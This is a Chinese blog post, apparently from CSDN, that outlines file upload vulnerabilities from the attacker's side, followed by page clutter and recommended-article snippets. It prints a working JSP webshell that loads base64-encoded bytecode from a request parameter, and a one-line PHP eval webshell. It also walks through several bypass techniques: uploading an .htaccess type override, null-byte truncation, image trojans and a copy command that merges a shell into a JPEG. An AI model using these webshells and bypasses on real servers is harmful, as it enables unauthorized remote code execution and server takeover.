文件上传漏洞简述

最新推荐文章于 2024-03-12 13:22:39 发布
最新推荐文章于 2024-03-12 13:22:39 发布
阅读量1.8k 收藏
点赞数
分类专栏: 安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527658/article/details/122090806
版权

前提:一句话木马,可用php、jsp、asp等;学会选择小马(什么语言环境写的马就用什么语言的马),工具菜刀、蚁剑(功能全)等

附一个jsp马

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

php马

<?php eval(@$_POST['a']); ?>

1.被上传的环境不存在任何类型的验证

直接上传漏洞,菜刀直接连接即可

2.上传图片马

可以被利用的条件是:能够上传成功;上传后直接访问并能够生成我们的小马.jsp或者.php等

符合上面条件直接上菜刀

3.黑名单绕过

例如上传的类型不可为jsp、php等等脚本语言的类型文件

上传一个内容为jsp小马代码的txt文件,并且上传一个重写文件拓展名的.htaccess文件;

<Directory />
    Options FollowSymLinks
    AllowOverride All
    AddType application/x-httpd-txt .jsp    #将.txt后缀的文件作为jsp文件解析
</Directory>

上传成功后上菜刀,尝试连接

4.00截断

将burpsuite抓包到的上传数据包的文件名改为1.jsp.txt ;将"."hex值 改为00,放包

5.某不知名方法

抓包,将上传的文本内容写的特别长,导致内存溢出..上传成功

补充:制作一句话图片木马

利用windows的copy

copy  phto.jpg/b+muma.php  muma.jpg

床前明月光,疑似地下霜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php文件上传原理与实现方法详解
10-15
主要介绍了php文件上传原理与实现方法,结合实例形式详细分析了PHP文件上传的配置、前后台处理、错误处理等相关操作技巧与注意事项,需要的朋友可以参考下
JAVA学习之ClassLoader
marcushbs的博客
06-10 1098
JAVA学习之ClassLoader 前言 最近被 一句话所触动——种一棵树最好的时间是十年前,其次是现在。所以决定要开始记录自己的学习之路。 什么是类加载? 我们都知道,每个.java文件可以经过javac指令编译成.class文件,里面包含着java虚拟机的机器指令。当我们需要使用一个java类时,虚拟机会加载它的.class文件,创建对应的java对象。将.class调入虚拟机的过程,称之为加载。 loading :加载。通过类的完全限定名找到.class字节码文件,同时创建一个对象。...
【网络安全渗透】常见文件上传漏洞处理与防范
最新发布
景天科技苑
03-12 1182
文件上传漏洞是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限 向服务器上传可执行的动态脚本文件。如常见的头像上传,图片上传,oa 办公文件上传,媒体上传,允许 用户上传文件,如果过滤不严格,恶意用户利用文件上传漏洞,上传有害的可以执行脚本文件到服务器中, 可以获取服务器的权限,或进一步危害服务器。
this.getClass().getClassLoader().getResource和this.getClass().getResource的区别和联系
weixin_61241721的博客
10-23 1669
this.getClass().getClassLoader().getResource和this.getClass().getResource的区别和联系
用友时空KSOAV9.0文件上传漏洞复现
weixin_53884648的博客
05-22 1131
用友时空文件上传漏洞复现
漏洞复现 - - -Tomcat弱口令漏洞
weixin_67503304的博客
08-07 7010
通过弱口令的方法爆破tomcat漏洞,通过上传war包拿到shell,简单的弱口令漏洞复现。
tomcat put方法任意写文件漏洞
weixin_48739941的博客
04-21 2830
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
阿赛文件上传系统 v9
04-23
阿赛文件上传系统功能简述:上传文件到指定文件夹对上传文件类型、大小限制按原始文件名上传文件重命名文件上传指定文件名上传无表单,编辑器专用文件上传与返回上传文件后返回绝对地址上传文件后返回完整网站上传...
win2008 服务器上传限制简述
09-30
Windows Server 2008比Windows Server 2003要好点,Windows Server 2003限制200K,而Windows Server 2008限制30M,虽然好点,但还是挺麻烦的。
简述Java异步上传文件的三种方式
05-24
主要为大家详细介绍了Java异步上传文件的三种方式,感兴趣的小伙伴们可以参考一下
软件漏洞分析简述!!!
02-04
针对软件漏洞一些基本的概念的介绍,还有一些主要的漏洞分析过程和实验结果,最后是对软件漏洞发展趋势进行分析。其中参考了《0day安全_软件漏洞分析技术(第2版)》,《漏洞战争》,《软件漏洞分析技术》等书籍。希望...
this.getClass().getClassLoader().getResource(““) 异常
码农践行
05-24 6010
参考:http://www.qchcloud.cn/tn/article/35 this.getClass().getClassLoader().getResource("") 异常 1、this.getClass().getClassLoader().getResource("")获取文件路径时,里面的路径空格会被“%20”代替,这时候如果你用这个获取到的包含“%20”的路径来new一个Fil...
常见中间件漏洞复现(上)
Askshhbs的博客
04-26 990
面试的时候会经常问关于中间件的漏洞,这里做一下漏洞的复现巩固一下 在虚拟机中安装docker环境具体就不演示了Vulhub - Docker-Compose file for vulnerability environment Tomcat漏洞 Tomcat 任意文件写入(CVE-2017-12615) 影响范围: Tomcat 7.0.0-7.0.81(默认配置) 测试环境:Apache Tomcat v8.5.39 漏洞本质:Tomcat配置文件/conf/web.xml 配置了可写(rea
Jeecg弱口令后台上传getShell渗透测试
kelenwait的博客
06-30 3000
前言 Jeecg(J2EE Code Generation)是一款基于代码生成器JEE的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发),可以帮助解决Java项目90%的重复工作,让开发更多关注业务逻辑。既能快速提高开发效率,帮助公司节省人力成本,同时又不失灵活性。 影响版本 jeecg v_3.8 漏洞复现 1.使用弱口令登录系统 admin/123456 2.进入后台后访问url 上传文件(绕过) /jeecgFormDemoContro
decode函数吗 jsp_蚁剑改造计划之实现JSP一句话
weixin_39969028的博客
12-30 527
前言本人有意写一份系列文章,主要内容是分享蚁剑改造过程中的一些技巧与经验。因为蚁剑的相关文档实在比较少,可能很多同学都像自己当初一样想要二次开发可是不知如何下手。不敢贸然称之为教程,只是把改造的过程发出来供大家借鉴,希望其他同学能够少走弯路。正文基本原理由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即...
vluhub漏洞复现笔记:CVE-2022-22965:Spring Framework
weixin_46497491的博客
02-09 473
vluhub漏洞复现笔记:CVE-2022-22965:Spring Framework
海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
热门推荐
0xSec
05-22 1万+
海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
[JAVA安全webshell]冰蝎jsp木马分析
GX233的博客
05-03 1万+
冰蝎JSPwebshell
中间件:tomcat弱口令
zh的博客
10-15 1283
靶场地址:http://www.whalwl.site:18081 解题准备:弱口令、准备asp、jsp马 解题思路: 1、进入网站默认登录地址,使用弱口令tomcat tomcat登录后台 http://www.whalwl.site:18081/manager/html 2、在war上传点上传一句话,要求是.war后缀 3、第一次使用asp木马,虽然能够连接但似乎没有权限,无法读取文件 4、第二次使用jsp木马,网上复制一个蚁剑的,密码是passwd <%! cl.
简述文件上传漏洞的原理
06-13
文件上传漏洞的原理是在Web应用程序中,上传文件时没有对上传文件的类型、大小、内容进行充分的检查和限制,导致攻击者可以上传恶意文件,从而对Web服务器和系统进行攻击。攻击者可以将恶意文件命名为具有可执行性质的文件名,如.php、.jsp、.asp等,然后上传到服务器上。如果服务器没有对上传的文件进行充分的检查和限制,那么恶意文件就会被上传到服务器上并被执行,从而导致Web服务器和系统受到攻击。通过文件上传漏洞,攻击者还可以上传包含恶意代码的Webshell,从而获取系统的控制权,进一步攻击服务器和系统。因此,文件上传漏洞是一种非常危险的网络安全漏洞。为了防止文件上传漏洞,应用程序需要对上传的文件进行严格的检查和限制,如文件类型、大小、内容等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值